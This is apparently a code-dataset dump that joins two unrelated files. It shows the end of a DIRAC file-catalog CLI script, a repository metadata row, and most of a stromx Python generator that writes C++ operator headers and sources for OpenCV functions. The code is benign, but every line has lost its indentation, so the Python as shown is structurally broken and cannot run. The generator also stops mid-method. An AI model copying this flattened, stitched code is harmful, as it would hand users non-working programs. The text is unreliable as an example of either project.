total = time.time() - start
print "Catalog repaired in %.2f sec", total
def do_exit(self, args):
""" Exit the shell.
usage: exit
"""
sys.exit(0)
def emptyline(self):
pass
if __name__ == "__main__":
if len(sys.argv) > 2:
print FileCatalogClientCLI.__doc__
sys.exit(2)
elif len(sys.argv) == 2:
catype = sys.argv[1]
if catype == "LFC":
from DIRAC.Resources.Catalog.LcgFileCatalogProxyClient import LcgFileCatalogProxyClient
cli = FileCatalogClientCLI(LcgFileCatalogProxyClient())
print "Starting LFC Proxy FileCatalog client"
cli.cmdloop()
elif catype == "DiracFC":
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
cli = FileCatalogClientCLI(FileCatalogClient())
print "Starting ProcDB FileCatalog client"
cli.cmdloop()
else:
print "Unknown catalog type", catype
|
Sbalbp/DIRAC
|
DataManagementSystem/Client/FileCatalogClientCLI.py
|
Python
|
gpl-3.0
| 76,823
|
[
"DIRAC"
] |
c80329ccf449dc6e8f664535bfef3c6f289319610112597ecbf4e73e227b422c
|
# -*- coding: utf-8 -*-
import document
import interface
import package
import rulegenerator
import testgenerator
class ArgumentVisitorBase(interface.ArgumentVisitor):
def visitReturnValue(self, retValue):
self.visitAllocation(retValue)
class SingleArgumentVisitor(ArgumentVisitorBase):
"""
Visitor which handles compound arguments and calls the accept methods
of each component of the compound arguments. I.e. derived visitors do not
have to care about compound arguments they only have to consider "single"
arguments.
"""
def visitCompound(self, compound):
for arg in compound.args:
if not arg is None:
arg.accept(self)
class CollectVisitor(SingleArgumentVisitor):
"""
Visitor stores all arguments it visits the common set self.args.
"""
def __init__(self):
self.args = set()
def visitInput(self, inputArg):
self.args.add(inputArg)
def visitParameter(self, parameter):
self.args.add(parameter)
def visitConstant(self, const):
self.args.add(const)
def visitRefInput(self, refInput):
self.args.add(refInput)
def visitAllocation(self, allocation):
self.args.add(allocation)
def visitInputOutput(self, inputOutput):
self.args.add(inputOutput)
def visitOutput(self, output):
self.args.add(output)
class MethodGenerator(object):
"""
Abstract base class of all generators which output files depending on
operators. It provides utility functions used by the derived classes.
"""
class CollectParametersVisitor(SingleArgumentVisitor):
def __init__(self):
self.params = []
def visitParameter(self, parameter):
self.params.append(parameter)
class DocVisitor(SingleArgumentVisitor):
"""
Visitor which holds a document.
"""
def __init__(self, doc):
self.doc = doc
def __init__(self):
self.p = None
self.m = None
self.doc = None
def save(self, package, method, printResult = False):
"""
Writes the output of the generator for the input method to the current
document and optionally prints it to the standard output.
"""
self.p = package
self.m = method
self.doc = document.Document()
self.optionParam = self.createOptionParameter()
self.generate()
if printResult:
print self.doc.string()
def createOptionParameter(self):
"""
Creates and returns an enum parameters which provides one value for
each option of the method.
"""
p = package.EnumParameter("dataFlow", "Data flow")
p.isInit = True
for opt in self.m.options:
desc = package.EnumDescription(opt.ident.constant(), str(opt.name))
desc.name = opt.name
p.descriptions.append(desc)
return p
def visitAll(self, visitor):
"""
Collects all arguments of all options.
"""
for opt in self.m.options:
for arg in opt.args:
arg.accept(visitor)
self.optionParam.accept(visitor)
def visitParameters(self, visitor, visitOptionParam = True):
"""
Collects all arguments of all options and removes duplicates (i.e.
arguments with common identifier). Then the visitor visits all
remaining arguments and the option parameter if the according flag is
set to true.
"""
v = CollectVisitor()
for opt in self.m.options:
for arg in opt.args:
arg.accept(v)
args = v.args
argIdents = set()
filteredArgs = set()
for arg in args:
if str(arg.ident) not in argIdents:
argIdents.add(str(arg.ident))
filteredArgs.add(arg)
for arg in sorted(filteredArgs, key=lambda arg: str(arg.ident)):
arg.accept(visitor)
if visitOptionParam and self.optionParam:
self.optionParam.accept(visitor)
def visitOption(self, opt, visitor):
"""
The visitor visits all arguments of the given option.
"""
for arg in opt.args:
arg.accept(visitor)
def namespaceEnter(self):
"""
Enters the namespace of the package the method belongs to.
"""
self.doc.namespaceEnter("stromx")
self.doc.namespaceEnter(self.p.ident)
def namespaceExit(self):
"""
Exits the package namespace.
"""
self.doc.namespaceExit(self.p.ident)
self.doc.namespaceExit("stromx")
self.doc.blank()
class OpHeaderGenerator(MethodGenerator):
"""
Generates the header of a method operator.
"""
class ConnectorEnumVisitor(SingleArgumentVisitor):
"""
Exports the enumeration of the IDs of all visited input and output
connectors.
"""
def __init__(self):
self.inputs = []
self.outputs = []
self.params = []
def visitRefInput(self, refInputArg):
self.inputs.append(refInputArg)
def visitInput(self, inputArg):
self.inputs.append(inputArg)
def visitInputOutput(self, arg):
self.inputs.append(arg)
self.outputs.append(arg)
def visitOutput(self, output):
self.inputs.append(output)
self.outputs.append(output)
def visitAllocation(self, allocation):
self.outputs.append(allocation)
def visitParameter(self, parameter):
self.params.append(parameter)
def export(self, doc):
inputIds = ["INPUT_{0}".format(i.ident.constant()) for i in
self.inputs]
outputIds = ["OUTPUT_{0}".format(i.ident.constant()) for i in
self.outputs]
paramIds = ["PARAMETER_{0}".format(i.ident.constant()) for i in
self.params]
inputIds = sorted(set(inputIds))
outputIds = sorted(set(outputIds))
paramIds = sorted(set(paramIds))
dataIds = inputIds + outputIds + paramIds
doc.enum("DataId", dataIds)
class DataMemberVisitor(MethodGenerator.DocVisitor):
"""
Exports class members for the values of all visited parameters.
"""
def visitParameter(self, parameter):
l = "{0} {1};".format(parameter.dataType.concreteTypeId(),
parameter.ident.attribute())
self.doc.line(l)
class DescriptionsVisitor(MethodGenerator.DocVisitor):
"""
Exports class members for the parameter description of all visited
parameters.
"""
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.PLAIN:
self.doc.line(("runtime::Parameter* m_{0}Parameter;"
).format(parameter.ident))
elif parameter.argType == package.ArgType.ENUM:
self.doc.line(("runtime::EnumParameter* m_{0}Parameter;"
).format(parameter.ident))
elif parameter.argType == package.ArgType.NUMERIC:
self.doc.line(("runtime::NumericParameter<{1}>* m_{0}Parameter;"
).format(parameter.ident,
parameter.dataType.typeId()))
elif parameter.argType == package.ArgType.MATRIX:
self.doc.line(("runtime::MatrixParameter* m_{0}Parameter;"
).format(parameter.ident))
else:
assert(False)
def visitOutput(self, arg):
self.visitInput(arg)
def visitInputOutput(self, arg):
self.visitInput(arg)
def visitAllocation(self, arg):
self.visitInput(arg)
def visitRefInput(self, arg):
self.visitInput(arg)
def visitInput(self, arg):
self.doc.line((
"runtime::Input* m_{0}Description;"
).format(arg.ident))
class EnumParameterIdVisitor(MethodGenerator.DocVisitor):
"""
Exports enumerations for the IDs of all visited enumeration parameters.
"""
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
keys = []
for desc in parameter.descriptions:
keys.append(desc.ident)
enumName = "{0}Id".format(parameter.ident.className())
self.doc.enum(enumName, keys)
class EnumConversionDeclVisitor(MethodGenerator.DocVisitor):
"""
Exports declarations of conversion functions for each visited
enumeration parameter.
"""
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
name = parameter.ident.className()
l = "int convert{0}(const runtime::Enum & value);".format(name)
self.doc.line(l)
def generate(self):
self.__includeGuardEnter()
self.__includes()
self.namespaceEnter()
self.__classEnter()
self.__public()
v = OpHeaderGenerator.EnumParameterIdVisitor(self.doc)
self.visitParameters(v)
v = OpHeaderGenerator.ConnectorEnumVisitor()
self.visitAll(v)
v.export(self.doc)
self.__constructor()
self.__kernelOverloads()
self.__private()
self.__statics()
self.__setupFunctions()
v = OpHeaderGenerator.EnumConversionDeclVisitor(self.doc)
self.visitParameters(v, False)
self.doc.blank()
v = OpHeaderGenerator.DataMemberVisitor(self.doc)
self.visitParameters(v)
v = OpHeaderGenerator.DescriptionsVisitor(self.doc)
self.visitParameters(v)
self.__classExit()
self.namespaceExit()
self.__includeGuardExit()
filename = "stromx/{0}/{1}.h".format(self.p.ident,
self.m.ident.className())
with file(filename, "w") as f:
f.write(self.doc.string())
def __includes(self):
self.doc.line('#include "stromx/{0}/Config.h"'.format(self.p.ident))
self.doc.line('#include <stromx/cvsupport/Matrix.h>')
self.doc.line('#include <stromx/runtime/Enum.h>')
self.doc.line('#include <stromx/runtime/EnumParameter.h>')
self.doc.line('#include <stromx/runtime/List.h>')
self.doc.line('#include <stromx/runtime/MatrixParameter.h>')
self.doc.line('#include <stromx/runtime/NumericParameter.h>')
self.doc.line('#include <stromx/runtime/OperatorException.h>')
self.doc.line('#include <stromx/runtime/OperatorKernel.h>')
self.doc.line('#include <stromx/runtime/Primitive.h>')
self.doc.line('#include <stromx/runtime/Variant.h>')
self.doc.line('#include <stromx/runtime/Visualization.h>')
self.doc.blank()
def __includeGuardEnter(self):
self.doc.line("#ifndef {0}".format(self.__includeGuard()))
self.doc.line("#define {0}".format(self.__includeGuard()))
self.doc.blank()
def __classEnter(self):
self.doc.line("class {0} {1} : public runtime::OperatorKernel".format(
self.__apiDecl(), self.m.ident.className()))
self.doc.line("{")
self.doc.increaseIndent()
def __public(self):
self.doc.label("public")
def __constructor(self):
self.doc.line("{0}();".format(self.m.ident.className()))
def __kernelOverloads(self):
self.doc.line("virtual OperatorKernel* clone() const "
"{{ return new {0}; }}".format(self.m.ident.className()))
self.doc.line("virtual void setParameter(const unsigned int id, "
"const runtime::Data& value);")
self.doc.line("virtual const runtime::DataRef getParameter("
"const unsigned int id) const;")
self.doc.line("void initialize();")
self.doc.line("virtual void execute(runtime::DataProvider& provider);")
self.doc.blank()
def __private(self):
self.doc.label("private")
def __statics(self):
self.doc.line("static const std::string PACKAGE;")
self.doc.line("static const runtime::Version VERSION;")
self.doc.line("static const std::string TYPE;")
self.doc.blank()
def __setupFunctions(self):
self.doc.line("const std::vector<const runtime::Parameter*> "
"setupInitParameters();")
self.doc.line("const std::vector<const runtime::Parameter*> "
"setupParameters();")
self.doc.line("const std::vector<const runtime::Input*> "
"setupInputs();")
self.doc.line("const std::vector<const runtime::Output*> "
"setupOutputs();")
self.doc.blank()
def __classExit(self):
self.doc.decreaseIndent()
self.doc.line("};")
def __includeGuardExit(self):
self.doc.line("#endif // {0}".format(self.__includeGuard()))
def __includeGuard(self):
return "STROMX_{0}_{1}_H".format(self.p.ident.upper(),
self.m.ident.upper())
def __apiDecl(self):
return "STROMX_{0}_API".format(self.p.ident.upper())
class OpImplGenerator(MethodGenerator):
"""
Generates the header of a method operator.
"""
class ParameterInitVisitor(MethodGenerator.CollectParametersVisitor):
"""
Exports the constructor initialization for all visited parameter data
members .
"""
def export(self, doc):
for i, p in enumerate(self.params):
defaultValue = p.default if p.default != None else ""
defaultValue = document.pythonToCpp(defaultValue)
init = "{0}({1})".format(p.ident.attribute(), defaultValue)
if i != len(self.params) - 1:
doc.line("{0},".format(init))
else:
doc.line(init)
class GetParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports case sections which return the values of all visited
parameters.
"""
def visitParameter(self, parameter):
self.doc.label("case PARAMETER_{0}".format(parameter.ident.constant()))
self.doc.line("return {0};".format(parameter.ident.attribute()))
class SetParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports case sections which set the values of all visited parameters.
"""
def visitParameter(self, parameter):
l = ""
if parameter.argType == package.ArgType.PLAIN:
pass
elif parameter.argType == package.ArgType.ENUM:
l = ("cvsupport::checkEnumValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
elif parameter.argType == package.ArgType.NUMERIC:
l = ("cvsupport::checkNumericValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
elif parameter.argType == package.ArgType.MATRIX:
l = ("cvsupport::checkMatrixValue(castedValue, {0}Parameter, *this);"
).format(parameter.ident.attribute())
else:
assert(False)
self.__setParameterWithCheck(parameter, l)
def __setParameterWithCheck(self, parameter, check):
self.doc.label("case PARAMETER_{0}".format(parameter.ident.constant()))
self.doc.scopeEnter()
self.doc.line(("const {0} & castedValue = runtime::data_cast<{1}>(value);"
).format(parameter.dataType.typeId(),
parameter.dataType.typeId()))
l = ("if(! castedValue.variant().isVariant({0}))".format(
parameter.dataType.variant()))
self.doc.line(l)
self.doc.scopeEnter()
l = 'throw runtime::WrongParameterType(parameter(id), *this);'
self.doc.line(l)
self.doc.scopeExit()
if check != "":
self.doc.line(check)
checkParams = rulegenerator.CheckParameterVisitor(self.doc,
parameter)
for rule in parameter.rules:
rule.accept(checkParams)
self.doc.line(("{0} = castedValue;"
).format(parameter.ident.attribute()))
self.doc.scopeExit()
self.doc.line("break;")
class SetupParametersVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited parameters.
"""
def __init__(self, doc, isInit = False):
super(OpImplGenerator.SetupParametersVisitor, self).__init__(doc)
self.isInit = isInit
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.PLAIN:
self.__visitPlainParameter(parameter)
elif parameter.argType == package.ArgType.ENUM:
self.__visitEnumParameter(parameter)
elif parameter.argType == package.ArgType.MATRIX:
self.__visitMatrixParameter(parameter)
elif parameter.argType == package.ArgType.NUMERIC:
self.__visitNumericParameter(parameter)
else:
assert(False)
def __visitPlainParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = "{0} = new runtime::Parameter(PARAMETER_{1}, {2});"\
.format(ident, parameter.ident.constant(),
parameter.dataType.variant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitEnumParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = ("{0} = new runtime::EnumParameter(PARAMETER_{1});"
).format(ident, parameter.ident.constant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
for desc in parameter.descriptions:
d = 'runtime::Enum({0})'.format(desc.ident)
l = '{0}->add(runtime::EnumDescription({1}, L_("{2}")));'\
.format(ident, d, desc.name)
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitMatrixParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = "{0} = new runtime::MatrixParameter(PARAMETER_{1}, {2});"\
.format(ident, parameter.ident.constant(),
parameter.dataType.variant())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'.format(ident, parameter.name)
self.doc.line(l)
self.doc.line("{0}->setRows({1});".format(ident, parameter.rows))
self.doc.line("{0}->setCols({1});".format(ident, parameter.cols))
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __visitNumericParameter(self, parameter):
ident = "m_{0}Parameter".format(parameter.ident)
l = ("{0} = new runtime::NumericParameter<{2}>(PARAMETER_{1});"
).format(ident, parameter.ident.constant(),
parameter.dataType.typeId())
self.doc.line(l)
self.__accessMode(ident)
l = '{0}->setTitle(L_("{1}"));'\
.format(ident, parameter.name)
self.doc.line(l)
if parameter.maxValue != None:
l = "{0}->setMax({1});".format(ident,
parameter.dataType.cast(parameter.maxValue))
self.doc.line(l)
if parameter.minValue != None:
l = "{0}->setMin({1});".format(ident,
parameter.dataType.cast(parameter.minValue))
self.doc.line(l)
if parameter.step != None:
l = "{0}->setStep({1});".format(ident,
parameter.dataType.cast(parameter.step))
self.doc.line(l)
l = "parameters.push_back({0});".format(ident)
self.doc.line(l)
self.doc.blank()
def __accessMode(self, ident):
if self.isInit:
accessMode = "NONE_WRITE"
else:
accessMode = "ACTIVATED_WRITE"
l = "{0}->setAccessMode(runtime::Parameter::{1});"\
.format(ident, accessMode)
self.doc.line(l)
class SetupOutputsVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited outputs.
"""
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
if output.argType == package.ArgType.PLAIN:
self.__setupDescription(output)
elif output.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(output)
else:
assert(False)
def visitAllocation(self, allocation):
self.visitOutput(allocation)
def __setupDescription(self, arg):
l = "runtime::Output* {0} = new runtime::Output(OUTPUT_{1}, {2});"\
.format(arg.ident, arg.ident.constant(),
arg.dataType.variant())
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'.format(arg.ident, arg.name)
self.doc.line(l)
if arg.isAsynchronous:
l = '{0}->setOperatorThread(1);'.format(arg.ident)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(arg.ident, variant)
self.doc.line(l)
l = "outputs.push_back({0});".format(arg.ident)
self.doc.line(l)
self.doc.blank()
def __setupMatrixDescription(self, arg):
l = ("runtime::Output* {0} = new "
"runtime::Output(OUTPUT_{1}, {2});")\
.format(arg.ident, arg.ident.constant(),
arg.dataType.variant())
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'.format(arg.ident, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(arg.ident, variant)
self.doc.line(l)
l = '{0}->setRows({1});'.format(arg.ident, arg.rows)
self.doc.line(l)
l = '{0}->setCols({1});'.format(arg.ident, arg.cols)
self.doc.line(l)
if arg.isAsynchronous:
l = '{0}->setOperatorThread(1);'.format(arg.ident)
self.doc.line(l)
l = "outputs.push_back({0});".format(arg.ident)
self.doc.line(l)
self.doc.blank()
class SetupInputsVisitor(MethodGenerator.DocVisitor):
"""
Exports the allocation of the descriptions of all visited inputs.
"""
def visitOutput(self, arg):
if arg.argType == package.ArgType.PLAIN:
self.__setupDescription(arg, True)
elif arg.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(arg, True)
else:
assert(False)
def visitInput(self, arg):
if arg.argType == package.ArgType.PLAIN:
self.__setupDescription(arg, False)
elif arg.argType == package.ArgType.MATRIX:
self.__setupMatrixDescription(arg, False)
else:
assert(False)
def visitInputOutput(self, arg):
self.visitInput(arg)
def __setupDescription(self, arg, isOutput):
description = "{0}Description".format(arg.ident.attribute())
l = "{0} = new runtime::Input(INPUT_{1}, {2});"\
.format(description, arg.ident.constant(),
self.__getVariant(arg, isOutput))
self.doc.line(l)
l = '{0}->setTitle(L_("{1}"));'\
.format(description, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(description, variant)
self.doc.line(l)
l = "inputs.push_back({0});".format(description)
self.doc.line(l)
self.doc.blank()
def __setupMatrixDescription(self, arg, isOutput):
description = "{0}Description".format(arg.ident.attribute())
l = (
"{0} = new "
"runtime::Input(INPUT_{1}, {2});"
).format(description, arg.ident.constant(),
self.__getVariant(arg, isOutput))
self.doc.line(l)
l = '{0}->setTitle("{1}");'.format(description, arg.name)
self.doc.line(l)
if arg.visualization:
variant = arg.visualization.variant
l = '{0}->setVisualization({1});'.format(description, variant)
self.doc.line(l)
l = '{0}->setRows({1});'.format(description, arg.rows)
self.doc.line(l)
l = '{0}->setCols({1});'.format(description, arg.cols)
self.doc.line(l)
l = "inputs.push_back({0});".format(description)
self.doc.line(l)
self.doc.blank()
def __getVariant(self, arg, isOutput):
if isOutput:
return arg.dataType.canBeCreatedFromVariant()
else:
return arg.dataType.variant()
class InputMapperVisitor(MethodGenerator.DocVisitor):
"""
Exports input mappers for all visited inputs and outputs.
"""
def visitInput(self, arg):
self.__visit(arg)
def visitOutput(self, arg):
self.__visit(arg)
def visitInputOutput(self, arg):
self.__visit(arg)
def __visit(self, arg):
ident = arg.ident
constant = arg.ident.constant()
l = "runtime::Id2DataPair {0}InMapper(INPUT_{1});".format(ident, constant)
self.doc.line(l)
class ReceiveInputDataVisitor(SingleArgumentVisitor):
"""
Exports the receive input command for all visited inputs and outputs.
"""
def __init__(self):
self.line = ""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitOutput(self, output):
self.__visit(output)
def visitInputOutput(self, arg):
self.__visit(arg)
def export(self, doc):
if self.line != "":
doc.line("provider.receiveInputData({0});".format(self.line))
def __visit(self, arg):
if self.line == "":
self.line = "{0}InMapper".format(arg.ident)
else:
self.line += " && {0}InMapper".format(arg.ident)
class InDataVisitor(MethodGenerator.DocVisitor):
"""
Exports stromx::Data* variables for all visited inputs and outputs.
"""
def visitInput(self, inputArg):
self.doc.line(("const runtime::Data* "
"{0}Data = 0;").format(inputArg.ident))
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
self.doc.line("runtime::Data* {0}Data = 0;".format(output.ident))
class AccessVisitor(MethodGenerator.DocVisitor):
"""
Exports data accessors for all visited inputs and outputs.
"""
def visitInput(self, inputArg):
self.doc.line(("runtime::ReadAccess "
"{0}ReadAccess;").format(inputArg.ident))
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
mapper = "{0}InMapper".format(output.ident)
data = "{0}Data".format(output.ident)
self.doc.line(("runtime::DataContainer inContainer = "
"{0}.data();").format(mapper))
self.doc.line("runtime::WriteAccess writeAccess(inContainer);")
self.doc.line("{0} = &writeAccess.get();".format(data))
class CopyWriteAccessVisitor(SingleArgumentVisitor):
"""
Exports the if-conditions which either create a read access or
reference an existing write access to read each visited input.
"""
def __init__(self):
self.output = None
self.inputs = []
def visitInput(self, inputArg):
self.inputs.append(inputArg)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
assert(self.output == None)
self.output = output
def export(self, doc):
# no danger of reading a write access if there is no output (i.e.
# no write access)
if self.output == None:
for i in self.inputs:
l = ("{0}ReadAccess = runtime::ReadAccess("
"{0}InMapper.data());").format(i.ident)
doc.line(l)
l = "{0}Data = &{0}ReadAccess.get();".format(i.ident)
doc.line(l)
doc.blank()
return
# check if a read access refers to the same data as the write
# acess and handle this situation accordingly
for i in self.inputs:
l = "if({0}InMapper.data() == inContainer)".format(i.ident)
doc.line(l)
doc.scopeEnter()
if i.inPlace:
doc.line("srcData = &writeAccess.get();")
else:
message = '"Can not operate in place."'
ex = (
"throw runtime::InputError(INPUT_{0}, *this, {1});"
).format(i.ident.constant(), message)
doc.line(ex)
doc.scopeExit()
doc.line("else")
doc.scopeEnter()
l = ("{0}ReadAccess = runtime::ReadAccess("
"{0}InMapper.data());").format(i.ident)
doc.line(l)
l = "{0}Data = &{0}ReadAccess.get();".format(i.ident)
doc.line(l)
doc.scopeExit()
doc.blank()
class CheckVariantVisitor(MethodGenerator.DocVisitor):
"""
Exports the variant check for each visited input.
"""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
l = (
"if(! {0}Data->variant().isVariant({1}Description->variant()))"
).format(arg.ident, arg.ident.attribute())
self.doc.line(l)
self.doc.scopeEnter()
l = (
'throw runtime::InputError(INPUT_{0}, *this, "Wrong input data '
'variant.");'
).format(arg.ident.constant())
self.doc.line(l)
self.doc.scopeExit()
class CastedDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the cast to a concrete stromx data type for each visited
input and output.
"""
def visitInput(self, inputArg):
l = ("const {1}* {0}CastedData = "
"runtime::data_cast<{1}>({0}Data);").format(inputArg.ident,
inputArg.dataType.typeId())
self.doc.line(l)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
l = ("{1} * {0}CastedData = "
"runtime::data_cast<{1}>({0}Data);").format(output.ident,
output.dataType.typeId())
self.doc.line(l)
class CheckCastedDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the data check for the data check of each visited input.
"""
def visitInput(self, inputArg):
self.__visit(inputArg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
if arg.argType == package.ArgType.MATRIX:
l = (
"cvsupport::checkMatrixValue(*{0}CastedData, {1}Description, *this);"
).format(arg.ident, arg.ident.attribute())
self.doc.line(l)
else:
pass
class InitInVisitor(MethodGenerator.DocVisitor):
"""
Exports the initialization of the argument before the OpenCV
function is called.
"""
def visitConstant(self, arg):
self.__visit(arg)
def visitInputOutput(self, arg):
self.__visit(arg)
def visitOutput(self, output):
self.__visit(output)
def __visit(self, arg):
self.doc.document(arg.initIn)
class CvDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the conversion to a native or OpenCV data type for each visited
argument.
"""
def visitInput(self, inputArg):
cvData = "{0} {1}CvData".format(inputArg.cvType.typeId(),
inputArg.ident)
castedData = "*{0}CastedData".format(inputArg.ident)
cast = inputArg.cvType.cast(castedData)
l = "{0} = {1};".format(cvData, cast)
self.doc.line(l)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, inputArg):
cvData = "{0} {1}CvData".format(inputArg.cvType.typeId(),
inputArg.ident)
castedData = "*{0}CastedData".format(inputArg.ident)
cast = inputArg.cvType.cast(castedData)
l = "{0} = {1};".format(cvData, cast)
self.doc.line(l)
def visitAllocation(self, allocation):
cvData = "{0} {1}CvData;".format(allocation.cvType.typeId(),
allocation.ident)
self.doc.line(cvData)
def visitParameter(self, parameter):
if parameter.argType == package.ArgType.ENUM:
self.__visitEnumParameter(parameter)
else:
cvData = "{0} {1}CvData".format(parameter.cvType.typeId(),
parameter.ident)
castedData = parameter.cvType.cast(parameter.ident.attribute())
self.doc.line("{0} = {1};".format(cvData, castedData))
def __visitEnumParameter(self, parameter):
ident = parameter.ident
cvData = "{0} {1}CvData".format(parameter.cvType.typeId(),
ident)
castedData = "convert{0}({1})".format(ident.className(),
ident.attribute())
self.doc.line("{0} = {1};".format(cvData, castedData))
def visitRefInput(self, refInput):
cvData = "{0} {1}CvData".format(refInput.cvType.typeId(),
refInput.ident)
rhs = "{0}CvData".format(refInput.refArg.ident)
self.doc.line("{0} = {1};".format(cvData, rhs))
class MethodArgumentVisitor(ArgumentVisitorBase):
"""
Exports the argument of the OpenCV function for each visited argument.
"""
def __init__(self):
self.args = []
def visitInput(self, inputArg):
self.visit(inputArg)
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
self.visit(output)
def visitAllocation(self, allocation):
self.visit(allocation)
def visitParameter(self, parameter):
self.visit(parameter)
def visitConstant(self, constant):
value = constant.value
value = document.pythonToCpp(value)
self.args.append(str(value))
def visitRefInput(self, refInput):
self.visit(refInput)
def visitReturnValue(self, retValue):
pass
def visit(self, arg):
self.args.append("{0}CvData".format(arg.ident))
def visitCompound(self, compound):
self.args.append(compound.create())
def export(self):
argStr = ""
for i, arg in enumerate(self.args):
argStr += arg
if i < len(self.args) - 1:
argStr += ", "
return argStr
class MethodReturnValueVisitor(ArgumentVisitorBase):
"""
Exports the return value of the OpenCV function out of each visited argument.
"""
def __init__(self):
self.returnValue = ""
def visitReturnValue(self, retVal):
self.returnValue = "{0}CvData = ".format(retVal.ident)
def export(self):
return self.returnValue
class OutDataVisitor(MethodGenerator.DocVisitor):
"""
Exports the wrapping of the result data into a data container for
each visited output or allocation.
"""
def visitInputOutput(self, arg):
self.visitOutput(arg)
def visitOutput(self, output):
l = "runtime::DataContainer {0}OutContainer = inContainer;".format(output.ident)
self.doc.line(l)
l = ("runtime::Id2DataPair {0}OutMapper(OUTPUT_{1}, "
"{0}OutContainer);").format(output.ident, output.ident.constant());
self.doc.line(l)
def visitAllocation(self, allocation):
dataType = allocation.dataType.typeId()
ident = allocation.ident
cvData = "{0}CvData".format(ident)
newObject = allocation.dataType.allocate(cvData)
l = "{0}* {1}CastedData = {2};".format(dataType, ident, newObject)
self.doc.line(l)
l = ("runtime::DataContainer {0}OutContainer = "
"runtime::DataContainer({0}CastedData);").format(ident)
self.doc.line(l)
l = ("runtime::Id2DataPair {0}OutMapper(OUTPUT_{1}, "
"{0}OutContainer);").format(ident, allocation.ident.constant())
self.doc.line(l)
class InitOutVisitor(MethodGenerator.DocVisitor):
"""
Exports the initialization of the output argument after the OpenCV
function is called.
"""
def visitAllocation(self, allocation):
self.doc.document(allocation.initOut)
class SendOutputDataVisitor(SingleArgumentVisitor):
"""
Exports the send output command for all visited outputs.
"""
def __init__(self):
self.line = ""
def visitAllocation(self, output):
self.__visit(output)
def visitOutput(self, output):
self.__visit(output)
def visitInputOutput(self, arg):
self.__visit(arg)
def export(self, doc):
if self.line != "":
doc.line("provider.sendOutputData({0});".format(self.line))
def __visit(self, arg):
if self.line == "":
self.line = "{0}OutMapper".format(arg.ident)
else:
self.line += " && {0}OutMapper".format(arg.ident)
class EnumConversionDefVisitor(MethodGenerator.DocVisitor):
"""
Exports the function which converts an enumeration value to its
OpenCV value for each visited enumeration parameter.
"""
def __init__(self, doc, m):
super(OpImplGenerator.EnumConversionDefVisitor, self).__init__(doc)
self.m = m
def visitParameter(self, parameter):
if parameter.argType != package.ArgType.ENUM:
return
name = parameter.ident.className()
l = ("int {1}::convert{0}(const runtime::Enum & value)"
).format(name, self.m.ident.className())
self.doc.line(l)
self.doc.scopeEnter()
self.doc.line("switch(int(value))")
self.doc.scopeEnter()
for desc in parameter.descriptions:
self.doc.label("case {0}".format(desc.ident))
self.doc.line("return {0};".format(desc.cvIdent))
self.doc.label("default")
self.doc.line(("throw runtime::WrongParameterValue(parameter(PARAMETER_{0}),"
" *this);").format(parameter.ident.constant()))
self.doc.scopeExit()
self.doc.scopeExit()
self.doc.blank()
def generate(self):
self.__includes()
self.namespaceEnter()
self.__statics()
self.__constructor()
self.__getParameter()
self.__setParameter()
self.__setupInitParameters()
self.__setupParameters()
self.__setupInputs()
self.__setupOutputs()
self.__initialize()
self.__execute()
self.__convertEnumValues()
self.namespaceExit()
filename = "stromx/{0}/{1}.cpp".format(self.p.ident,
self.m.ident.className())
with file(filename, "w") as f:
f.write(self.doc.string())
def __includes(self):
cvModule = str(self.p.ident)[2:]
self.doc.line('#include "stromx/{0}/{1}.h"'\
.format(self.p.ident, self.m.ident.className()))
self.doc.blank()
self.doc.line('#include "stromx/{0}/Locale.h"'.format(self.p.ident))
self.doc.line('#include "stromx/{0}/Utility.h"'.format(self.p.ident))
